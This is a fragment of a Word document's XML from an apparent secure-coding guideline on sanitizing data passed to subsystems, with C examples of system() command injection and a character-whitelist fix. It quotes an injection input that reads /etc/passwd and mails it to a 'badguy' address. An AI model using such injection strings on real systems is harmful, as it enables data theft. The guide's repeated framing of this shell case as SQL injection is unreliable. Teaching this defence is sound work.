            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608161A4" w14:textId="068C3009" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E8BB44E" w14:textId="79AA1041" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId27" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rule STR30-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30910B79" w14:textId="531BE767" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Checks for writing to const qualified object (rule fully covered)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81F282B" w:rsidR="00381847" w:rsidRDefault="00D14250">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sanitize data passed to complex subsystems</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EFD67ED" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00D14250">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00D14250">
              <w:t>002</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00D14250">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D0F26FC" w14:textId="5A4D755D" w:rsidR="00381847" w:rsidRDefault="00D14250">
            <w:r>
              <w:t xml:space="preserve">String data passed into </w:t>
            </w:r>
            <w:r w:rsidR="00A27109">
              <w:t>another system can trigger actions that are unintended and lead to vulnerabilities. All data should be sanitized before passing into these sub-systems to prevent that.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BFF1B4" w14:textId="5701CCF0" w:rsidR="00A27109" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:r>
              <w:t>This code uses  an input email string as an argument in a call the system(). If the user passed in,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70470021" w14:textId="07CB889E" w:rsidR="00F72634" w:rsidRDefault="00254C20" w:rsidP="00A27109">
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidR="00A27109" w:rsidRPr="002D401D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>bogus@addr.com; cat /etc/passwd  | mail some@badguy.net</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00A27109">
              <w:t>, information can be accessed inappropriately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="555F1178" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D2C7634" w14:textId="77777777" w:rsidR="00A27109" w:rsidRPr="00A27109" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sprintf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(buffer, "/bin/mail %s &lt; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">/email", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2AE2AEF7" w14:textId="2DBF929E" w:rsidR="00F72634" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:r w:rsidRPr="00A27109">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ED64588" w:rsidR="00F72634" w:rsidRDefault="00A27109" w:rsidP="0015146B">
            <w:r>
              <w:t>By creating  a list of acceptable characters, the data can be sanitized and checked for unacceptable and risky characters that may allow SQL injection to occur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="270FEC8A" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0EF3D1FE"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color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ok_chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACBB8EB"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color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>                         "ABCDEFGHIJKLMNOPQRSTUVWXYZ"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3481D954"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color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>                         "1234567890_-.@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="747B29B4"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] = "Bad char 1:} Bad char 2:{</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="33FBD574"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">*cp = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>; /* Cursor into string */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F388EBE"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color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">*end = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strlen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="17C8F36E"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color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(cp += </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strspn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">(cp, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ok_chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>); cp != end; cp += </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strspn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">(cp, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ok_chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132F85BA" w14:textId="77777777" w:rsidR="00A27109" w:rsidRPr="00A27109" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  *cp = '_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>';</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4E978D2E" w14:textId="5E359C81" w:rsidR="00F72634" w:rsidRDefault="00A27109" w:rsidP="00A27109">
            <w:r w:rsidRPr="00A27109">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>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436A8720" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sanitize Data Sent to Other Systems</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – sanitizing data prevents SQL injection. The area which handles the data will use different systems that cannot be exploited, compared to the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>final destination</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the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1A3C43" w14:paraId="5FAB2FBC" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F3D274" w14:textId="4C639FFE" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CDD9AA9" w14:textId="321DCC43" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C831C3D" w14:textId="626956F9" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
